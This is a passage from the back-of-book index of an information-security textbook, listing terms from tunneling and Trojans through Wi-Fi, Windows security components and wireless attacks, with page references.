    tunneling, 130–132
Transport Layer Security virtual private network (TLS VPN), 130–132
transport mode, 132
transport protocols, 102
transport/communication encryption, G-28, 63–64
transposition algorithms, 39
Trello, 185
trend analysis, G-28, 268
Triple DES (3DES), 215
Tripwire, 281
TRNG. see true random number generator (TRNG)
Trojans, G-29, 26, 372
true negatives, 362
true random number generator (TRNG), 55
Trusted Computing Group (TCG), 278
trusted execution environment (TEE), 57, 482
trusted platform module (TPM), G-29, 56, 62, 277
TTP. see tactic, technique, or procedure (TTP)
tunnel mode, 132
tunnel/tunneling, G-29, 129–130
    internet protocol security tunneling, 132–133
    transport layer security tunneling, 130–132
tuples, 264, 363
I2P, 237
Twitter, 93
2FA. see two-factor authentication (2FA)
two-factor authentication (2FA), 74
Type I error, 74
Type II error, 74
type-safe programming languages, G-29, 221
typosquatting, G-29, 33

U

UAC. see User Account Control (UAC)
UAV. see unmanned aerial vehicle (UAV)
UBA. see user behavior analytics (UBA)
UDP. see User Datagram Protocol (UDP)
UEBA. see user and entity behavior analytics (UEBA)
UEFI. see Unified Extensible Firmware Interface (UEFI)
ultrasonic sensors, 205
unauthorized access (black hat), 19
unauthorized servers, 309
unclassified (public) data, 472
underblocking, 270
web filtering, G-30, 269–270
    agent-based filtering, 269
    benefits of, 269
    block rules, 270
    centralized, 269–270
    content categorization, 270
    issues related to, 270
    reputation-based filtering, 270
    URL scanning, 269–270
web media, 27
web metadata, 355
WebAuthn, 78
Webex, 185
WebSocket, 134
WEP. see Wired Equivalent Privacy (WEP)
whaling, 33
white box testing, 239
white hat (authorized access), 19
wide area networks (WANs), 101
Widget, 91
Wi-Fi
    authentication, 258–259
        advanced authentication, 258–259
        Remote Authentication Dial-In User Service, 259
        WPA2 pre-shared key authentication, 258
        WPA3 personal authentication, 258
    deperimeterization and, 164
    easy connect, 257
    hotspots, 86
    installation considerations, 254–255
        heat maps, 255
        site surveys, 254–255
        wireless access point placement, 254
    network, 74
    tethering, 297
        ad hoc Wi-Fi, 297
        personal area networks, 297
        tethering and hotspots, 297
        Wi-Fi Direct, 297
Wi-Fi Direct, 297
Wi-Fi Protected Access (WPA), G-30, 63, 65, 256
Wi-Fi Protected Access 3 (WPA3), 257, 258
Wi-Fi Protected Setup (WPS), G-30, 256–257
Wi-Fi tethering, 297
WikiLeaks, 20
wildcard domain, G-30, 52–53
Windows
    authentication, 89
    discretionary access control, 81
    Elevation of Privilege vulnerability, 220
    end-of-life status, 212
    Group Policy, 285, 288
    Group Policy Objects in Windows Server 2016, 85
    Local Security Authority Subsystem Service (LSASS), 394–395
    local sign-in, 89
    logs, 350
    network sign-in, 89
    NT LAN Manager (NTLM), 394, 395
    registry, 342
    remote sign-in, 89
    Security Account Manager (SAM), 394–395
    sign-in screen, 71
    SYSTEM, 377, 395, 400
    System File Checker tool, 280
    system memory acquisition, 342
    User Account Control, 83, 87
    vulnerabilities, 210, 211, 244
Windows Active Directory (AD), 89, 91, 93, 94, 396
Windows Active Directory network, 85, 394
Windows BitLocker, 277, 278
Windows Defender, 351
Windows Desktop benchmarks, 252
Windows Event Viewer, 349, 351
Windows File Protection service, 280
Windows Intune, 293
    for locking down Android connectivity methods, 296
    restricting device permissions using, 295
Windows Management Instrumentation (WMI), 373, 374, 397
Windows Server benchmarks, 252
Windows Server range, 148
Windows Update, 279
Wired Equivalent Privacy (WEP), G-30, 256
wired network vectors, 25
wireless access point (WAP), 102, 254
wireless attacks, 391–392
    key recovery, 392
    rogue access points, 391–392
    wireless denial of service attack, 392
    wireless replay, 392
wireless denial of service (DoS) attack, 392
wireless encryption, 256–257
    Wi-Fi Protected Access 3, 257
    Wi-Fi Protected Setup, 256–257
wireless networks. see Wi-Fi
wireless replay, 392
wireless vectors, 26
Wireshark, 307, 354, 389
WMI. see Windows Management Instrumentation (WMI)
WO. see Work Order (WO)
Work Order (WO), 457
work recovery time (WRT), G-30, 450
workforce capacity, changes in, 185
workforce multiplier, G-30, 435
working (operation), 412
workstation security, 416